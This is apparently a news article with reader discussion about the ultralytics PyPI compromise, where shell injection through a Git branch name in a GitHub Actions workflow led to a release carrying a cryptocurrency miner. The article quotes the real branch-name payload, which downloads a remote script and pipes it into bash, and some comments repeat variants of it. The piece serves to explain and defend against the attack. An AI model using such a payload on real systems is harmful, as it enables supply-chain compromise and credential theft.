Abusing Git branch names to compromise a PyPI package
A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:
openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous-integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI, adding a cryptocurrency miner to it. It is hard to be sure of the details, because GitHub has already removed the malicious script.
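To make the mechanism concrete, here is a rough sketch (not the actual ultralytics workflow) of what the runner hands to the shell once a ${{...}} template expression carrying the branch name has been textually substituted into the step's script:

    # Hypothetical step script after the Actions runner has substituted the
    # attacker-controlled branch name into the script text. The quoting does
    # not help: the command substitution is now part of the script itself.
    echo "Formatting branch $({curl,-sSfL,raw.githubusercontent.com/.../file.sh}${IFS}|${IFS}bash)"
    # The $(...) runs immediately: brace expansion turns {curl,-sSfL,<url>}
    # into "curl -sSfL <url>", ${IFS} stands in for the spaces that Git
    # forbids in branch names, and the downloaded script is piped straight
    # into bash with whatever credentials the job has.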
This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
Posted Dec 6, 2024 19:04 UTC (Fri)
by quotemstr (subscriber, #45331)
[Link] (14 responses)
I come down *hard* for limiting identifiers to the smallest possible character set, especially in non-user-facing contexts. Programming identifiers should be printable ASCII characters with no whitespace. KISS.
Posted Dec 6, 2024 19:58 UTC (Fri)
by epa (subscriber, #39769)
[Link]
Even then you should be stricter with the first character, since strings beginning with - can still cause mischief in shell command lines or in some languages such as Tcl.
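A tiny illustration (hypothetical value; grep stands in for any option-parsing tool):

    value='-r'                 # hostile input whose first character is "-"
    grep "$value" file.txt     # correctly quoted, yet grep parses it as its -r option
    grep -e "$value" file.txt  # treated as a pattern; many tools also accept "--" for this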
Posted Dec 7, 2024 1:52 UTC (Sat)
by geofft (subscriber, #59789)
[Link] (2 responses)
I would agree it doesn't make sense to allow things like dollar signs in usernames. I do think there's merit in considering permitting alphanumeric characters from other alphabets (accented Latin letters, Arabic, Devanagari, Hiragana, etc.)—but not their punctuation or whitespace, either. (Of course even this proposal deserves some careful consideration.)
Posted Dec 7, 2024 14:54 UTC (Sat)
by quotemstr (subscriber, #45331)
[Link] (1 responses)
Banning literal terminal control codes in usernames would merely be a good start.
Posted Dec 8, 2024 3:51 UTC (Sun)
by geofft (subscriber, #59789)
[Link]
Posted Dec 7, 2024 15:26 UTC (Sat)
by mathstuf (subscriber, #69389)
[Link] (9 responses)
- protected branches
- jobs with a specific "environment" tag attached to them
I think there is absolutely no reason that PR CI pipelines/workflows should have any access to *any* secrets regardless of whether they can be coaxed into doing unintended things or not.
Posted Dec 7, 2024 16:39 UTC (Sat)
by excors (subscriber, #95769)
[Link] (8 responses)
According to https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-... (previously linked by nickodell), the exploited workflow didn't have permissions to publish directly, but the exploit probably used cache poisoning as a method of privilege escalation. (I think that workflow is just a bot that auto-formats and adds slightly patronising LLM-generated comments to pull requests.)
As detailed in https://adnanthekhan.com/2024/05/06/the-monsters-in-your-... , GitHub Actions has (optional) caching support for the inputs and outputs of workflows. The cache server uses branches as the security boundary: cache entries written by a workflow in a given branch can only be read by workflows in the same branch or a descendant (pull requests, forked projects, etc). In this case, the exploited workflow is configured as pull_request_target which is triggered by a pull request but executes in the project's main branch (unlike pull_request which executes in the pull request's branch, I think). That means it can write arbitrary data into the main branch's cache, and any other workflows running in the main branch with caching enabled will read from that poisoned cache.
That includes the workflow that signs and publishes artifacts to PyPI, which uses a pip cache for the standard dependencies of the publish scripts. The attacker can insert their own files into the pip cache, allowing arbitrary code execution in the publish workflow.
The cache poisoning article recommends "Never run untrusted code within the context of the main branch if any other workflows use GitHub Actions caching", and the zizmor article says pull_request_target is "a fundamentally dangerous workflow trigger". GitHub's documentation doesn't go that far, but does mention cache poisoning and other dangers with pull_request_target (https://docs.github.com/en/actions/writing-workflows/choo...).
It looks like Ultralytics violated multiple security best practices here - but on the other hand, it looks like GitHub has created a large number of footguns and made it very tricky to use GitHub Actions securely, so I'm not sure how much I can blame their users for getting it wrong.
Posted Dec 7, 2024 21:05 UTC (Sat)
by mathstuf (subscriber, #69389)
[Link] (7 responses)
> (I think that workflow is just a bot that auto-formats and adds slightly patronising LLM-generated comments to pull requests.)
Ugh. "Fix formatting" commits are pretty much the epitome of useless commit noise. Useless diff, useless commit message. I've gone over that in comments here previously; I'll avoid rehashing it again.
> it looks like GitHub has created a large number of footguns and made it very tricky to use GitHub Actions securely, so I'm not sure how much I can blame their users for getting it wrong.
Yes…I've mostly done GitLab-CI, but every time I visit GHA I am rebuffed by its (to me) unnecessary complexity.
Posted Dec 8, 2024 4:17 UTC (Sun)
by geofft (subscriber, #59789)
[Link] (1 responses)
pip, on the other hand, caches build artifacts globally (user-wide), in the sense that an upstream project that only provides source code gets built into binary form (a wheel) locally by itself, and then that wheel is installed into whichever environment you're running pip on. As with the cargo situation, there's nothing to chain hash verification to for a locally-built binary artifact. But because the binary artifacts are shared, cache poisoning is indeed easy.
I can't think of a way to solve either of these robustly - any place that you store the hash of the output is going to be as vulnerable as the output itself, no? I think the only thing you can do is to make the cache read-only when doing builds of attacker-controlled code, and only write to the cache on CI runs triggered post merge (or if the PR author is trusted). This appears to be less than straightforward with github.com/actions/cache, and I'm very much not sure if that really makes the cache read-only or if it only skips an intentional write, such that a sufficiently clever attacker-controlled script can talk to the cache API itself and do a write with the same credentials used to read the cache.
(Also, the pip ecosystem includes the option to get binaries from the registry, and it is standard practice to provide and to use these binaries - this makes sense because Python users are generally not expected to have a working C toolchain since they're writing an interpreted language, but Rust is itself a compiled language and needs at least a linker and the libc development library/headers from a C toolchain, so Python users benefit much more than Rust users from precompiled libraries. I don't know offhand if pip is good at verifying the hash of a wheel in the cache that is attested in the registry, or if it doesn't distinguish such wheels from locally-built wheels.)
Posted Dec 8, 2024 7:35 UTC (Sun)
by mathstuf (subscriber, #69389)
[Link]
> If you also cache the current working directory, which is a reasonable thing to want to do to speed up build times in a project with a bunch of third-party dependencies, then I believe cache poisoning is pretty easy.
Yeah, that seems a lot easier to target. For compilation, we use `sccache`. Not only does this get us cache hits across crates, but it also means we're not limited to storing only "the last version built" in the cache.
Posted Dec 8, 2024 10:25 UTC (Sun)
by excors (subscriber, #95769)
[Link] (4 responses)
This is getting far beyond my ability to research it with even a little bit of confidence, so you definitely shouldn't trust what I'm saying. But I get the impression that the GitHub Actions pip cache works by caching ~/.cache/pip, which includes both downloaded files and locally-built wheels (to save the cost of rebuilding packages before installing). There's no way to verify the integrity of those wheels, so an attacker tampering with them will cause trouble.
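pip can show what ends up in that cache directly, which makes the exposure easy to see (a sketch; paths are the Linux defaults):

    pip cache dir    # typically ~/.cache/pip
    pip cache list   # includes wheels that pip built locally from sdists
    # Those locally-built wheels are reused on later installs with nothing to
    # re-verify them against, which is what makes a shared, writable cache
    # such an attractive target.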
(The download cache may not be very secure either: "By default, pip does not perform any checks to protect against remote tampering and involves running arbitrary code from distributions" (https://pip.pypa.io/en/stable/topics/secure-installs/). It checks the (optional) hashes provided by index servers as "a protection against download corruption", not for security. You can improve that by specifying hashes in the local requirements.txt, though I don't know if verification happens before or after the cache.)
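As a sketch of that mitigation (the package name and digest are placeholders), hash-checking mode refuses anything that does not match a pinned digest:

    cat > requirements.txt <<'EOF'
    # placeholder digest; real values come from the index or `pip hash`
    somepackage==1.2.3 \
        --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
    EOF
    pip install --require-hashes -r requirements.txt

Whether that check is applied before or after the wheel cache is, as noted above, a separate question.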
Posted Dec 8, 2024 14:02 UTC (Sun)
by mathstuf (subscriber, #69389)
[Link]
Posted Dec 8, 2024 22:51 UTC (Sun)
by meejah (subscriber, #162580)
[Link]
That is, an end-user application can ship a "requirements.txt" file that contains hashes for all possible wheels for all exact versions of every requirement, and then pass `--require-hashes`. One problem is that it's "all possible wheels at some point in time" and authors may upload previously-non-existent wheels later.
I don't believe there's any way to declare your dependencies with hashes (e.g. a Python library or application can say "I depend on foo == 1.2.3" but cannot specify the hashes -- and yes, there are usually many because wheels are architecture / platform specific).
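For the application case described above, the digests at least do not have to be produced by hand (a sketch; the package name is a placeholder, and pip-tools' pip-compile --generate-hashes automates the same thing for a whole dependency tree):

    pip download --no-deps somepackage==1.2.3 -d /tmp/dl
    pip hash /tmp/dl/*    # prints --hash=sha256:... lines to paste into requirements.txt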
Posted Dec 8, 2024 23:31 UTC (Sun)
by randomguy3 (subscriber, #71063)
[Link] (1 responses)
I've occasionally run into this when some badly-behaved project overwrote a wheel (on a company-internal server) and all the builds that had existing caches broke!
Posted Dec 8, 2024 23:33 UTC (Sun)
by randomguy3 (subscriber, #71063)
[Link]
Posted Dec 6, 2024 19:16 UTC (Fri)
by raven667 (subscriber, #5198)
[Link] (21 responses)
Maybe tracing each code path which can result in fork() back to the beginning and putting a flag around each source that can turn it off/on so someone can create an allow list of what kinds of invocations they are willing to allow in their automation. People will probably hate it as much as SELinux if they have to enable things when their existing scripts break, but we'd have to make a collective decision as to what we value more, between system integrity and the work to actually enumerate all that should be allowed.
Maybe this could be a pragma comment in the scripts, like how you can ignore warnings with shellcheck, so you can say "yes please interpret and expand the arguments in this command" when that _is_ what you want to do in a way that is visible in the script.
Whatever we do, allowing data across a security boundary into an interactive command interpreter is a bad and dangerous thing to do, and we should make it easier to _not_ do that, which seems to be an impossible bar right now.
Posted Dec 6, 2024 19:51 UTC (Fri)
by excors (subscriber, #95769)
[Link] (7 responses)
GitHub Actions workflows are defined in YAML files, where you can use syntax like ${{github.ref}} in values. Those will be expanded by the action runner when it executes the workflow. (https://docs.github.com/en/actions/writing-workflows/choo...)
One of the values in the YAML file is a shell script to execute. If you use ${{github.ref}} in there, the attacker-provided branch name will be inserted before the script is passed to the shell. The attacker doesn't even need to use $(...) in the branch name, they can simply use "; to exit from the current shell command and start a new one, and the shell sees a totally normal sequence of basic commands. (See PoC in https://github.com/advisories/GHSA-7x29-qqmq-v6qc , which is a different but similar vulnerability in exactly the same project a few months ago.)
I think the specific vulnerability here is fixed in https://github.com/ultralytics/actions/commit/89c1f380073... by moving all the ${{...}} out of the shell script block and into the 'env' block where they can't do any harm (although actually the branch name was removed entirely; presumably they didn't need it at all).
GitHub warns about this problem at https://docs.github.com/en/actions/security-for-github-ac...
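The shape of that fix is worth spelling out (a sketch, not the actual ultralytics change): the untrusted value travels through the environment, so the shell only ever sees it as the contents of a variable rather than as script text.

    # Workflow side (YAML, shown here as comments):
    #     env:
    #       BRANCH_NAME: ${{ github.head_ref }}
    #     run: ./report.sh
    # Script side: the value is expanded exactly once, as data, never re-parsed.
    BRANCH_NAME='$({curl,-sSfL,example.invalid/x.sh}${IFS}|${IFS}bash)'   # as the runner might set it
    echo "Formatting branch $BRANCH_NAME"                                 # prints the name; nothing executes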
Posted Dec 6, 2024 20:37 UTC (Fri)
by wahern (subscriber, #37304)
[Link] (2 responses)
Posted Dec 6, 2024 21:14 UTC (Fri)
by jwarnica (subscriber, #27492)
[Link]
Posted Dec 7, 2024 11:02 UTC (Sat)
by epa (subscriber, #39769)
[Link]
But even without any attacker, constraining inputs is still good practice, I feel. It saves you time debugging later when a stray space character got into a value and (even though you were not mixing data and code) no longer compared equal to the value without a leading space. Something like a git branch name (or a username) is not the place to allow the full flowering of human creativity with special characters. There are plenty of commit message and comment fields for that.
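In that spirit, a conservative allow-list check is short enough to put in front of anything that consumes branch names or usernames (a sketch; $branch is a placeholder, and the exact character set is a matter of taste):

    check_name() {
        case "$1" in
            ''|[!A-Za-z0-9]*)   return 1 ;;  # empty, or first character not alphanumeric
            *[!A-Za-z0-9._/-]*) return 1 ;;  # any character outside the allow-list
        esac
    }
    check_name "$branch" || { echo "refusing suspicious name" >&2; exit 1; }

A side effect of the first-character rule is that leading hyphens, as discussed above, are rejected too.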
Posted Dec 7, 2024 5:59 UTC (Sat)
by raven667 (subscriber, #5198)
[Link] (2 responses)
What if multiple commands on a single line using `;` was also a flagged feature and not enabled by default or able to be disabled? I'm not smart enough to figure out a whole system on my own but I keep thinking we should find something as effective as SQL bind variables are in stopping unexpected command interpretation that can be applied to shell scripting, maybe the wholesale separation of the shell implementation used for interactive CLIs and for scripting and automation, to make the little bits of automation that are sprinkled _everywhere_ safer.
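The closest existing analogue to a bind variable in shell is probably the rule that untrusted data may only ever arrive as arguments or environment variables, never as script text (a sketch; the git command is arbitrary):

    branch="$1"                                  # untrusted data arrives as an argument
    git rev-parse --verify "refs/heads/$branch"  # expanded once, as a single word, never re-parsed
    # The injectable anti-pattern is re-scanning data as code:
    #   sh -c "git rev-parse --verify refs/heads/$branch"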
Posted Dec 7, 2024 10:02 UTC (Sat)
by NYKevin (subscriber, #129325)
[Link] (1 responses)
* Interactive use by a human.
* Scripting of things that would otherwise be done interactively by a human (as a timesaving measure for human sysadmins, not as something you programmatically invoke in production).
Everything else is an antipattern, where the shell has been co-opted to replace a missing feature in another program (often using the shell's -c flag).
Posted Dec 7, 2024 20:15 UTC (Sat)
by raven667 (subscriber, #5198)
[Link]
I'm just frustrated at seeing this same kind of problem again.
Posted Dec 7, 2024 10:57 UTC (Sat)
by fishface60 (subscriber, #88700)
[Link]
I see this bug everywhere; these YAML templating engines should require a schema to define how to escape interpolated values (e.g. like ninja, which shell-escapes everything in a command context), or else declare that part of the data format as not supporting interpolation.
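For the shell context specifically, "escape on interpolation" can be as simple as bash's printf %q (a sketch; the branch value is hypothetical):

    branch='$({curl,-sSfL,example.invalid/x.sh}${IFS}|${IFS}bash)'
    printf 'git fetch origin %q\n' "$branch"
    # %q re-quotes the value so that the emitted command line treats the
    # hostile name as data rather than code; a templating engine could do the
    # same for every value it interpolates into a shell block.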
Posted Dec 6, 2024 20:16 UTC (Fri)
by Wol (subscriber, #4433)
[Link]
The Pr1mos shell (early 80s) had something exactly like this. I don't remember the details, but v18 had a Command Processor Language (CPL) with all sorts of globbing. That then became part of the shell proper with v19. And I do remember something about switches where you could tell the shell to glob or not glob, and stuff like that. It's too long ago, but I do miss that power - so much of the past has been lost ...
Cheers,
Wol
Posted Dec 6, 2024 21:10 UTC (Fri)
by rweikusat2 (subscriber, #117920)
[Link] (6 responses)
At best, one could argue that GitHub shouldn't even provide such a feature because it's basically impossible to use it safely.
Posted Dec 6, 2024 21:15 UTC (Fri)
by pizza (subscriber, #46)
[Link] (5 responses)
But... it has an OpenSSF best practices badge, therefore it's safe and secure!
Posted Dec 6, 2024 21:47 UTC (Fri)
by david.a.wheeler (subscriber, #72896)
[Link] (4 responses)
I know you're being sarcastic, but I thought I should respond.
I'm technical lead of the OpenSSF Best Practices badge work. We know better than to claim *that*! If you look at the front page <https://www.bestpractices.dev> it says:
>> Consumers of the badge can quickly assess which FLOSS projects are following best practices and as a result are more likely to produce higher-quality secure software.
Unless you're making formal proofs of the code, "more likely" is all any list of criteria can hope to do. Thinking is *still* required. Thinking will be required next year, too :-).
Posted Dec 7, 2024 10:03 UTC (Sat)
by ma4ris8 (subscriber, #170509)
[Link] (3 responses)
but making non-trivial secure Bash scripts is difficult.
Are Rust scripts promoted as an alternative?
Posted Dec 7, 2024 15:36 UTC (Sat)
by smcv (subscriber, #53363)
[Link]
Shell script makes it very hard to avoid *other* vulnerabilities, but *this* vulnerability wasn't a shell problem.
Posted Dec 7, 2024 23:21 UTC (Sat)
by jengelh (guest, #33263)
[Link] (1 responses)
while read x y z; do foo "$x" | bar "$y" | baz "$z"; done <file
Now do that in Perl, Python, Lua, anything (or Rust if you insist). Whenever you need more than three lines, sh syntax "wins", as users like the terse-ness.
Posted Dec 9, 2024 10:44 UTC (Mon)
by taladar (subscriber, #68407)
[Link]
Posted Dec 6, 2024 23:34 UTC (Fri)
by ballombe (subscriber, #9523)
[Link] (3 responses)
Posted Dec 7, 2024 6:08 UTC (Sat)
by raven667 (subscriber, #5198)
[Link] (2 responses)
Posted Dec 9, 2024 10:46 UTC (Mon)
by taladar (subscriber, #68407)
[Link] (1 responses)
The main problem I see with a general taint flag on input is that tainted data is really not well defined. Data could be e.g. perfectly fine for use in a shell script but cause an injection in SQL or HTML.
Posted Dec 9, 2024 11:15 UTC (Mon)
by farnz (subscriber, #17727)
[Link]
Taint is well-defined, and doesn't mean "unsafe to use"; it means that the data came from an untrusted source, and has not yet been either validated for safety, or parsed into a trusted format.
The idea is that you have a "taint removal" layer that carefully handles potentially dangerous data, and converts it to a safe form or an error; most of your code doesn't go near the dangerous data, and the code that does can be carefully audited for correctness. Then, any injection bugs must either be in the "taint removal" layer, or in the layer that turns "safe" internal data into external data.
And note that this is a natural pattern in languages with strict type systems; you have parsers that takes input and turns it into internal structures, then you do your work on the internal structures, and you convert again from internal to external structures as you interact with other programs.
Posted Dec 7, 2024 16:35 UTC (Sat)
by eru (subscriber, #2753)
[Link]
Posted Dec 6, 2024 20:32 UTC (Fri)
by Bigos (subscriber, #96807)
[Link] (2 responses)
Maybe break the branch name so that it is over several lines?
Posted Dec 6, 2024 20:45 UTC (Fri)
by daroc (editor, #160859)
[Link] (1 responses)
Posted Dec 6, 2024 21:03 UTC (Fri)
by daroc (editor, #160859)
[Link]
Posted Dec 6, 2024 22:16 UTC (Fri)
by nickodell (subscriber, #125165)
[Link]
https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-...
Posted Dec 7, 2024 10:41 UTC (Sat)
by rudis (subscriber, #130572)
[Link]
Posted Dec 7, 2024 20:26 UTC (Sat)
by ewen (subscriber, #4772)
[Link]
https://github.com/ultralytics/ultralytics/issues/18027#i...
And the current theory is those were uploaded directly to PyPI, presumably using stolen credentials (eg a PAT — personal access token), since there doesn’t seem to be a matching GitHub CI run.
See also the summary from the repo owner:
https://github.com/ultralytics/ultralytics/pull/18018#iss...
But also note some of the details are disputed by one of the security researchers who looked into it in detail yesterday (and did a large write up linked by others earlier):
https://github.com/ultralytics/ultralytics/issues/18027#i...
So it appears there’ll need to be more cleanup from the attacker having got in via string interpolation issues :-/ And meanwhile a bunch of packages depending on the impacted package have locked the version to the last release before the malware infected versions and/or suggested their users check for and remove the affected versions.
I guess we should be glad it’s “just” a crypto miner this time (which is fairly noisy / obvious due to the CPU usage).
Ewen
Posted Dec 8, 2024 12:48 UTC (Sun)
by cbcbcb (subscriber, #10350)
[Link] (16 responses)
It would be rather inconvenient to rename "/home" as "/home$(touch /tmp/security_bug)", but I bet you'd still find a lot of broken filename handling if you did.
Posted Dec 8, 2024 13:14 UTC (Sun)
by mb (subscriber, #50428)
[Link] (1 responses)
Posted Dec 8, 2024 13:33 UTC (Sun)
by cbcbcb (subscriber, #10350)
[Link]
Posted Dec 8, 2024 19:52 UTC (Sun)
by eru (subscriber, #2753)
[Link]
Posted Dec 9, 2024 6:09 UTC (Mon)
by lkundrak (subscriber, #43452)
[Link] (8 responses)
Posted Dec 9, 2024 8:00 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (4 responses)
Posted Dec 9, 2024 9:06 UTC (Mon)
by zdzichu (subscriber, #17118)
[Link] (2 responses)
Posted Dec 9, 2024 18:33 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (1 responses)
Try setting your $HOME to a path with spaces, and watch the errors roll in as all kinds of scripts start breaking. GUI utils typically work fine, but anything with the shell scripts just cracks.
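The failure mode is almost always the same one (a sketch):

    HOME='/tmp/test home'   # hypothetical home directory containing a space
    mkdir -p "$HOME"
    cd $HOME                # unquoted: splits into two arguments and fails (or lands elsewhere)
    cd "$HOME"              # quoted: works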
Posted Dec 11, 2024 16:59 UTC (Wed)
by jezuch (subscriber, #52988)
[Link]
Oh the irony!
Posted Dec 9, 2024 10:26 UTC (Mon)
by leromarinvit (subscriber, #56850)
[Link]
Posted Dec 9, 2024 10:24 UTC (Mon)
by excors (subscriber, #95769)
[Link] (2 responses)
Posted Dec 9, 2024 16:54 UTC (Mon)
by raven667 (subscriber, #5198)
[Link] (1 responses)
Posted Dec 12, 2024 9:47 UTC (Thu)
by mgedmin (subscriber, #34497)
[Link]
GoboLinux, which I've never tried personally. I don't think it has any compatibility symlinks, just a directory tree with /Programs, /Users, etc.
Posted Dec 9, 2024 21:47 UTC (Mon)
by bearstech (subscriber, #160755)
[Link] (3 responses)
Posted Dec 10, 2024 8:12 UTC (Tue)
by Wol (subscriber, #4433)
[Link] (2 responses)
The number of programs (backup especially) that tried to glob the filename and then broke spectacularly ...
Cheers,
Wol
Posted Dec 10, 2024 11:22 UTC (Tue)
by taladar (subscriber, #68407)
[Link] (1 responses)
Posted Dec 10, 2024 12:40 UTC (Tue)
by Wol (subscriber, #4433)
[Link]
So with most of the * files being extensionless, the globbing really went mad (I think it actually went recursive!), and until we realised and put a bug in against the backup software, it caused us quite a bit of grief. Telling "our" software not to use *'s was not an option ...
Cheers,
Wol
Posted Dec 10, 2024 1:19 UTC (Tue)
by jthill (subscriber, #56558)
[Link] (2 responses)
The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight.
branchname='<that mess>'
git check-ref-format refs/heads/"$branchname" || die no that does not look good
Posted Dec 10, 2024 7:54 UTC (Tue)
by excors (subscriber, #95769)
[Link] (1 responses)
(check-ref-format does reject spaces, which is presumably why the branch name uses ${IFS} instead. It also rejects ASCII control characters, '~', '^', '?', '*', '[', '..', '//', '@{', '\', etc, and says "These rules make it easy for shell script based tools to parse reference names, pathname expansion by the shell when a reference name is used unquoted (by mistake), and also avoid ambiguities in certain reference name expressions" [I think it meant to say "*avoid* pathname expansion"?]. But if it's meant to be safe when mistakenly used unquoted, why does it still allow '$'?)
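To make that concrete (a sketch; the URL is a stand-in), check-ref-format balks at a literal space but, per the rules quoted above, waves the real-world shape of this attack straight through:

    git check-ref-format 'refs/heads/has space' && echo accepted            # rejected (non-zero exit)
    git check-ref-format 'refs/heads/$({curl,-sSfL,example.invalid/x.sh}${IFS}|${IFS}bash)' \
        && echo accepted                                                    # accepted: no forbidden characters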
Posted Dec 10, 2024 9:24 UTC (Tue)
by jthill (subscriber, #56558)
[Link]
I see you're correct. Yow. That's painful. I've probably made this mistake myself then.
Unless I'm still blindspotting, $branchname expanded, quoted or not, still won't be expanded again unless rescanned, like the expansion being passed to bash -c or something instead of the var being passed in the environment for the invoked bash to expand just the once itself.